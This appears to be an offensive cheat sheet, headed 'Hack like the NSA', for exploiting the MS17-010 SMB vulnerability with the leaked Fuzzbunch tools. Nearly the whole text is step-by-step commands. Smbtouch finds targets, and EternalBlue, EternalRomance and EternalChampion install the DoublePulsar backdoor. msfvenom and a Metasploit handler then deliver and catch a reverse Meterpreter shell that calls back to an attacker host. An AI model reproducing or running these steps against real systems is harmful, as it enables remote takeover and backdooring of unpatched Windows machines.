MS17-010

Hack like the NSA by exploiting the MS17-010 vulnerability.

Table of Contents

Fuzzbunch

Discover Vulnerable Targets
use Smbtouch
set TargetIP <IP>
set TargetPort <Port>
set Protocol <SMB/NBT>
execute

Write down the available pipe names and exploits.

Eternal Blue

This module is fully automated and is able to generate and inject the DoublePulsar backdoor by itself. When the backdoor is installed on the target system we can use it to run a reverse Meterpreter shell.

Generate and Inject DoublePulsar backdoor using EternalBlue:

use EternalBlue
set TargetIP <IP>
set TargetPort <Port>
set Target <XP/WIN72K8R2>
execute

Generate reverse Meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp -f dll -a <x86/x64> LHOST=<IP> LPORT=<Port> -o /tmp/reverse.dll

Start Metasploit handler:

use exploit/multi/handler
set payload windows/metrepreter/reverse_tcp
set LHOST <IP>
set LPORT <Port>
set ExitOnSession false
run -j

Run payload using DoublePulsar backdoor:

use DoublePulsar
set TargetIP <IP>
set TargetPort <Port>
set Protocol <SMB/RDP>
set Architecture <x86/x64>
set Function RunDLL
set DllPayload <C:\workspace\reverse.dll>
execute
Eternal Romance

First, generate shellcode with DoublePulsar. The output file (.bin) that contains the shellcode will be used by the Eternalromance exploit to infect the target with the DoublePulsar backdoor. When the backdoor is installed on the target system we can use it to run a reverse Meterpreter shell.

Generate DoublePulsar shellcode:

use DoublePulsar
set TargetIP <IP>
set TargetPort <Port>
set Protocol <SMB/RDP>
set Architecture <x86/x64>
set Function OutputInstall
set OutputFile C:\workspace\doublepulsar.bin
execute

Inject DoublePulsar backdoor using EternalRomance:

use EternalRomance
set TargetIP <IP>
set TargetPort <Port>
set ShellcodeFile C:\workspace\doublepulsar.bin
set PipeName <accessible pipe name from smbtouch>
set Protocol <SMB/NBT>
set Target <use tab completion to select target>
execute

Run touch within the EternalRomance module to run Smbtouch and automatically populate variables.

Generate reverse Meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp -f dll -a <x86/x64> LHOST=<IP> LPORT=<Port> -o /tmp/reverse.dll

Start Metasploit handler:

use exploit/multi/handler
set payload windows/metrepreter/reverse_tcp
set LHOST <IP>
set LPORT <Port>
set ExitOnSession false
run -j

Run payload using DoublePulsar backdoor:

use DoublePulsar
set TargetIP <IP>
set TargetPort <Port>
set Protocol <SMB/RDP>
set Architecture <x86/x64>
set Function RunDLL
set DllPayload <C:\workspace\reverse.dll>
execute
Eternal Champion

First, generate shellcode with DoublePulsar. The output file (.bin) contains the shellcode that will be used by the Eternalchampion exploit to infect the target with the DoublePulsar backdoor. When the backdoor is installed on the target system we can use it to run a reverse Meterpreter shell.

Generate DoublePulsar shellcode:

use DoublePulsar
set TargetIP <IP>
set TargetPort <Port>
set Protocol <SMB/RDP>
set Architecture <x86/x64>
set Function OutputInstall
set OutputFile C:\workspace\doublepulsar.bin
execute

Convert DoublePulsar shellcode to its string hex representation:

bin-to-shellcode.py <PATH TO BIN> > <OUTPUT FILE>

Note: bin-to-shellcode.py is available in C:\fuzzbunch on the custom NSA Windows XP virtual machine.

Alternatively, use the following PowerShell one-line:

PS C:\> [String]::Join('', (Get-Content <PATH TO BIN> -Encoding Byte | foreach {([Convert]::ToString($_, 16)).PadLeft(2, '0')}))

Inject DoublePulsar backdoor using EternalRomance: This exploit is abusing a race condition and will not work everytime even if the target is vulnerable.

use EternalChampion
set TargetIP <IP>
set TargetPort <Port>
set ShellcodeBuffer <Shellcode>
set PipeName <accessible pipe name from smbtouch>
set Protocol <SMB/NBT>
set Target <use tab completion to select target>
set TargetOsArchitecture <x86/x64>
execute

Select mode FB to run the exploit or DANE to generate the corresponding malicious DLL.

Generate reverse Meterpreter payload:

msfvenom -p windows/meterpreter/reverse_tcp -f dll -a <x86/x64> LHOST=<IP> LPORT=<Port> -o /tmp/reverse.dll

Start Metasploit handler:

use exploit/multi/handler
set payload windows/metrepreter/reverse_tcp
set LHOST <IP>
set LPORT <Port>
set ExitOnSession false
run -j

Run payload using DoublePulsar backdoor:

use DoublePulsar
set TargetIP <IP>
set TargetPort <Port>
set Protocol <SMB/RDP>
set Architecture <x86/x64>
set Function RunDLL
set DllPayload <C:\workspace\reverse.dll>
execute
References